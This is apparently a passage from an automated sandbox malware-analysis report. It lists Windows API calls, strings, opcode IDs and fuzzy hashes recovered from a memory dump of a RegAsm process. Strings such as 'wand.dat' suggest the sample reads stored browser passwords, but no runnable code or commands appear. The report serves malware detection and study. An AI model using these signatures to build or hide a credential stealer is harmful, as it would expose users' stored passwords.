                                                            • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4D2
                                                            • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                            • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4F3
                                                            • Part of subcall function 0040A212: wcscpy.MSVCRT ref: 0040A269
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.423481578.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                          • String ID: *.*$dat$wand.dat
                                                          • API String ID: 2618321458-1828844352
                                                          • Opcode ID: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                                                          • Instruction ID: e27ea46a2f82f1f177a07810d763c9ecc86b2647b265d762bc330c580f82b585
                                                          • Opcode Fuzzy Hash: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                                                          • Instruction Fuzzy Hash: BF419B71600205AFDB10AF65DC85EAEB7B9FF40314F10802BF909AB1D1EF7999958F89
                                                          APIs
                                                          • memset.MSVCRT ref: 00412057
                                                            • Part of subcall function 0040A116: ShellExecuteW.SHELL32(?,open,?,0044E518,0044E518,00000005), ref: 0040A12C
                                                          • SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004120C7
                                                          • GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 004120E1
                                                          • GetKeyState.USER32(00000010), ref: 0041210D
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.423481578.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: ExecuteMenuMessageSendShellStateStringmemset
                                                          • String ID:
                                                          • API String ID: 3550944819-0
                                                          • Opcode ID: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                                          • Instruction ID: 97bad96470fefb965444fbd8e179d7ef3b872eae7f66eff2ef5a186de824ffeb
                                                          • Opcode Fuzzy Hash: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                                          • Instruction Fuzzy Hash: 5341C330600305EBDB209F15CD88B9677A8AB54324F10817AEA699B2E2D7B89DD1CB14
                                                          APIs
                                                          • wcslen.MSVCRT ref: 0040A8E2
                                                            • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                            • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
                                                            • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
                                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                                          • memcpy.MSVCRT ref: 0040A94F
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.423481578.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: ??3@$memcpy$mallocwcslen
                                                          • String ID:
                                                          • API String ID: 3023356884-0
                                                          • Opcode ID: 4562b1f94f0a461de08a7f5e91ae4aaaeb7b7426ec7425c8aec4e78307d57c52
                                                          • Instruction ID: f32a9ac0308abec2140ef864181b54c8d04bf3279582b466e144db770ea3622c
                                                          • Opcode Fuzzy Hash: 4562b1f94f0a461de08a7f5e91ae4aaaeb7b7426ec7425c8aec4e78307d57c52
                                                          • Instruction Fuzzy Hash: 64217CB2200704EFC720DF18D88189AB3F9FF453247118A2EF866AB6A1CB35AD15CB55
                                                          APIs
                                                          • wcslen.MSVCRT ref: 0040B1DE
                                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040B201
                                                            • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                            • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
                                                            • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
                                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040B224
                                                          • memcpy.MSVCRT ref: 0040B248
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.423481578.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: ??3@$memcpy$mallocwcslen
                                                          • String ID:
                                                          • API String ID: 3023356884-0
                                                          • Opcode ID: 6ce6fee0dcc9b9c9ebe83d30a233e08065b6d511c8ed6dc8d89b241ff4cd5fb7
                                                          • Instruction ID: 71128cbd9221161776fa816c6212d75478d488e0bdd8d9cf72ea7cd81dda7be0
                                                          • Opcode Fuzzy Hash: 6ce6fee0dcc9b9c9ebe83d30a233e08065b6d511c8ed6dc8d89b241ff4cd5fb7
                                                          • Instruction Fuzzy Hash: 02215BB2500604EFD720DF18D881CAAB7F9EF49324B114A6EE452976A1CB35B9158B98
                                                          APIs
                                                          • strlen.MSVCRT ref: 0040B0D8
                                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040B0FB
                                                            • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                            • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
                                                            • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
                                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040B12C
                                                          • memcpy.MSVCRT ref: 0040B159
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.423481578.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: ??3@$memcpy$mallocstrlen
                                                          • String ID:
                                                          • API String ID: 1171893557-0
                                                          • Opcode ID: 1032aca3c4d565b21c9c93c1da03fa01242ca6c05261a3900927d5bb2d17b358
                                                          • Instruction ID: 61abf4b4d63bdfee40e3433ef4540d9b033b11d4199be086b3082c0bee804e2f
                                                          • Opcode Fuzzy Hash: 1032aca3c4d565b21c9c93c1da03fa01242ca6c05261a3900927d5bb2d17b358
                                                          • Instruction Fuzzy Hash: CA113A712042019FD711DB98FC499267B66EB8733AB25833BF4045A2A3CBB99834865F
                                                          APIs
                                                          • memset.MSVCRT ref: 004144E7
                                                            • Part of subcall function 0040A353: _snwprintf.MSVCRT ref: 0040A398
                                                            • Part of subcall function 0040A353: memcpy.MSVCRT ref: 0040A3A8
                                                          • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00414510
                                                          • memset.MSVCRT ref: 0041451A
                                                          • GetPrivateProfileStringW.KERNEL32(?,?,0044E518,?,00002000,?), ref: 0041453C
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.423481578.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                                          • String ID:
                                                          • API String ID: 1127616056-0
                                                          • Opcode ID: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                                                          • Instruction ID: e03fcf36bb778615f94f946172f2cadce4c7e53e7889dedf6030812535802df7
                                                          • Opcode Fuzzy Hash: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                                                          • Instruction Fuzzy Hash: 9A1170B1500119BFEF115F65EC02EDA7B69EF04714F100066FB09B2060E6319A60DB9D
                                                          APIs
                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,756F18FE,?,0041755F,?), ref: 00417452
                                                          • malloc.MSVCRT ref: 00417459
                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,756F18FE,?,0041755F,?), ref: 00417478
                                                          • ??3@YAXPAX@Z.MSVCRT ref: 0041747F
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.423481578.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: ByteCharMultiWide$??3@malloc
                                                          • String ID:
                                                          • API String ID: 4284152360-0
                                                          • Opcode ID: 04ed014176e6e25a75c769d411d0e5b4418e4c479d680d12870536ad94e91e4d
                                                          • Instruction ID: 8389f0226c663b3c6d8c6253af8546a3d73aba679155ae8f7c82d0c1376384d0
                                                          • Opcode Fuzzy Hash: 04ed014176e6e25a75c769d411d0e5b4418e4c479d680d12870536ad94e91e4d
                                                          • Instruction Fuzzy Hash: 1DF0E9B620D21E3F7B006AB55CC0C7B7B9CD7862FCB11072FF51091180E9594C1116B6
                                                          APIs
                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 00412403
                                                          • RegisterClassW.USER32(?), ref: 00412428
                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 0041242F
                                                          • CreateWindowExW.USER32(00000000,00000000,0044E518,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,00000000), ref: 00412455
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.423481578.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: HandleModule$ClassCreateRegisterWindow
                                                          • String ID:
                                                          • API String ID: 2678498856-0
                                                          • Opcode ID: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                                                          • Instruction ID: 2742b6e08e64d4f702ac0bdc031c2178a10537c5a2141806c9029dd5a11ba4c1
                                                          • Opcode Fuzzy Hash: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                                                          • Instruction Fuzzy Hash: E601E5B1941228ABD7119FA68C89ADFBEBCFF09B14F10411AF514A2240D7B456408BE9
                                                          APIs
                                                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,00417D63,?,?,00417D63,00418178,00000000,?,004183E5,?,00000000), ref: 004173FF
                                                          • malloc.MSVCRT ref: 00417407
                                                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,?,00417D63,00418178,00000000,?,004183E5,?,00000000,00000000,?), ref: 0041741E
                                                          • ??3@YAXPAX@Z.MSVCRT ref: 00417425
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.423481578.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: ByteCharMultiWide$??3@malloc
                                                          • String ID:
                                                          • API String ID: 4284152360-0
                                                          • Opcode ID: 3df1ff1ad5f7619570b5295ff2d6745c95529d6511ab958c6202ec18d606cc9c
                                                          • Instruction ID: cad4d062c051d68cf548c6c9b5623cfc012c7edadb1d539185634ca375d1558c
                                                          • Opcode Fuzzy Hash: 3df1ff1ad5f7619570b5295ff2d6745c95529d6511ab958c6202ec18d606cc9c
                                                          • Instruction Fuzzy Hash: E7F0377620921E7BDA1029655C40D77779CEB8B675B11072BBA10D21C1ED59D81005B5
                                                          APIs
                                                          • memset.MSVCRT ref: 0040F673
                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00007FFF,00000000,00000000,?,<item>), ref: 0040F690
                                                          • strlen.MSVCRT ref: 0040F6A2
                                                          • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F6B3
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.423481578.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                          • String ID:
                                                          • API String ID: 2754987064-0
                                                          • Opcode ID: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                                          • Instruction ID: e5447571fde1e0de43d26e7f5909b1ba013d3ab3fbf9ce0dfcc5e01eb4e41d37
                                                          • Opcode Fuzzy Hash: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                                          • Instruction Fuzzy Hash: 03F062B680102C7FEB81A794DC81DEB77ACEB05258F0080B2B715D2140E9749F484F7D
                                                          APIs
                                                          • memset.MSVCRT ref: 0040F6E2
                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF,00000000,00000000,?,<item>), ref: 0040F6FB
                                                          • strlen.MSVCRT ref: 0040F70D
                                                          • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F71E
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.423481578.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                          • String ID:
                                                          • API String ID: 2754987064-0
                                                          • Opcode ID: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                                                          • Instruction ID: 4069f22fd96ae38f7b0fbed24adb75974e75abfa9f51d26af0f678a77882025e
                                                          • Opcode Fuzzy Hash: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                                                          • Instruction Fuzzy Hash: C8F06DB780022CBFFB059B94DCC8DEB77ACEB05254F0000A2B715D2042E6749F448BB8
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.423481578.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: wcscpy$CloseHandle
                                                          • String ID: General
                                                          • API String ID: 3722638380-26480598
                                                          • Opcode ID: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                                                          • Instruction ID: 029e45c8424a23c50dbc4d8c1dfe1f9d14d00e2cf8bd1bf10ef2c4f99c7741b7
                                                          • Opcode Fuzzy Hash: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                                                          • Instruction Fuzzy Hash: 52F024B30083146FF7205B509C85EAF769CEB86369F25482FF05592092C7398C448669
                                                          APIs
                                                            • Part of subcall function 00409D7F: memset.MSVCRT ref: 00409D9E
                                                            • Part of subcall function 00409D7F: GetClassNameW.USER32(?,00000000,000000FF), ref: 00409DB5
                                                            • Part of subcall function 00409D7F: _wcsicmp.MSVCRT ref: 00409DC7
                                                          • SetBkMode.GDI32(?,00000001), ref: 004143A2
                                                          • SetBkColor.GDI32(?,00FFFFFF), ref: 004143B0
                                                          • SetTextColor.GDI32(?,00C00000), ref: 004143BE
                                                          • GetStockObject.GDI32(00000000), ref: 004143C6
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.423481578.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
                                                          • String ID:
                                                          • API String ID: 764393265-0
                                                          • Opcode ID: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                          • Instruction ID: 55a1794077c12dabf0ba6e1c8d3319674f3f2ba5a0574a39bcd6537ad23d1771
                                                          • Opcode Fuzzy Hash: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                          • Instruction Fuzzy Hash: 3AF06835200219BBCF112FA5EC06EDD3F25BF05321F104536FA25A45F1CBB59D609759
                                                          APIs
                                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A76D
                                                          • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?), ref: 0040A77D
                                                          • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 0040A78C
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.423481578.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: Time$System$File$LocalSpecific
                                                          • String ID:
                                                          • API String ID: 979780441-0
                                                          • Opcode ID: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                          • Instruction ID: f583aad53f3de4022dcae7e9f33737e8013f67213d7447df07319dea818b2b95
                                                          • Opcode Fuzzy Hash: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                          • Instruction Fuzzy Hash: 48F08272900219AFEB019BB1DC49FBBB3FCBB0570AF04443AE112E1090D774D0058B65
                                                          APIs
                                                          • memcpy.MSVCRT ref: 004134E0
                                                          • memcpy.MSVCRT ref: 004134F2
                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 00413505
                                                          • DialogBoxParamW.USER32(00000000,0000006B,?,Function_000131DC,00000000), ref: 00413519
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.423481578.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: memcpy$DialogHandleModuleParam
                                                          • String ID:
                                                          • API String ID: 1386444988-0
                                                          • Opcode ID: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                          • Instruction ID: 364e94b7bdcda47f4d7f1f8d7aeee0d56301a77e6e21c3ce81869cca2c347424
                                                          • Opcode Fuzzy Hash: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                          • Instruction Fuzzy Hash: 80F0E272A843207BF7207FA5AC0AB477E94FB05B03F114826F600E50D2C2B988518F8D
                                                          APIs
                                                          • wcschr.MSVCRT ref: 0040F79E
                                                          • wcschr.MSVCRT ref: 0040F7AC
                                                            • Part of subcall function 0040AA8C: wcslen.MSVCRT ref: 0040AAA8
                                                            • Part of subcall function 0040AA8C: memcpy.MSVCRT ref: 0040AACB
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.423481578.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: wcschr$memcpywcslen
                                                          • String ID: "
                                                          • API String ID: 1983396471-123907689
                                                          • Opcode ID: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                                                          • Instruction ID: b5ec2b97dc3a1d34b4ae52474db4a85f3d32b900c8044ec90cdce640e07fed14
                                                          • Opcode Fuzzy Hash: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                                                          • Instruction Fuzzy Hash: 7C315532904204ABDF24EFA6C8419EEB7B4EF44324F20457BEC10B75D1DB789A46CE99
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.423481578.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: _snwprintfmemcpy
                                                          • String ID: %2.2X
                                                          • API String ID: 2789212964-323797159
                                                          • Opcode ID: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                                                          • Instruction ID: 802357eb4f50a043e47c8b78e7782d62930b20b04af67ea92e1f933aeb07fc5a
                                                          • Opcode Fuzzy Hash: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                                                          • Instruction Fuzzy Hash: 71118E32900309BFEB10DFE8D8829AFB3B9FB05314F108476ED11E7141D6789A258B96
                                                          APIs
                                                          • memset.MSVCRT ref: 0040E770
                                                          • SendMessageW.USER32(F^@,0000105F,00000000,?), ref: 0040E79F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.423481578.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: MessageSendmemset
                                                          • String ID: F^@
                                                          • API String ID: 568519121-3652327722
                                                          • Opcode ID: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                                                          • Instruction ID: 5049a961280a3e8282645b70ff0f7bf8ff78c54eb6baa8beabb6daf17925e322
                                                          • Opcode Fuzzy Hash: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                                                          • Instruction Fuzzy Hash: A701A239900204ABEB209F5ACC81EABB7F8FF44B45F008429E854A7291D3349855CF79
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.423481578.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: PlacementWindowmemset
                                                          • String ID: WinPos
                                                          • API String ID: 4036792311-2823255486
                                                          • Opcode ID: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                                                          • Instruction ID: 942d740d8c3c01bede0812328a3a4706cce13fdf2e849e9dfea5930b7654417c
                                                          • Opcode Fuzzy Hash: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                                                          • Instruction Fuzzy Hash: D4F096B0600204EFEB04DF55D899F6A33E8EF04701F1440B9F909DB1D1E7B89A04C729
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.423481578.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: ??3@DeleteObject
                                                          • String ID: r!A
                                                          • API String ID: 1103273653-628097481
                                                          • Opcode ID: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                                          • Instruction ID: d381ae2e1f6c469d4091c7bd434485f036f098756071eb86a226830a39d2e28c
                                                          • Opcode Fuzzy Hash: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                                          • Instruction Fuzzy Hash: 72E04F75000302DFD7115F26E400782B7F5FF85315F11455EE89497151EBB96164CE19
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.423481578.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: ??2@$memset
                                                          • String ID:
                                                          • API String ID: 1860491036-0
                                                          • Opcode ID: 132c9519558d853c1af1b7fa7761ae76911dbcbc7ff65e94ed4645376a2186b4
                                                          • Instruction ID: 7dda0de82ffecb18951b1be6aadeef514c87807746e1e94fbb8d74dd8fa57bec
                                                          • Opcode Fuzzy Hash: 132c9519558d853c1af1b7fa7761ae76911dbcbc7ff65e94ed4645376a2186b4
                                                          • Instruction Fuzzy Hash: 4F21F3B1A003008FDB219F2B9445912FBE8FF90310B2AC8AF9158CB2B2D7B8C454CF15
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.423481578.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: ??2@
                                                          • String ID:
                                                          • API String ID: 1033339047-0
                                                          • Opcode ID: 6589a97820dd4164dbe9b7b561e5d9da651562f836a554c3bd3b183484c6dcee
                                                          • Instruction ID: 5f4fc1bc6a90e200713bb7744dd8ab6a017b0cf4e98027731d5581fdeff4b0c3
                                                          • Opcode Fuzzy Hash: 6589a97820dd4164dbe9b7b561e5d9da651562f836a554c3bd3b183484c6dcee
                                                          • Instruction Fuzzy Hash: B00121B2A413005EEB7ADF38EE5772966A0AF4C351F01453EA246CD1F6EEF58480CB49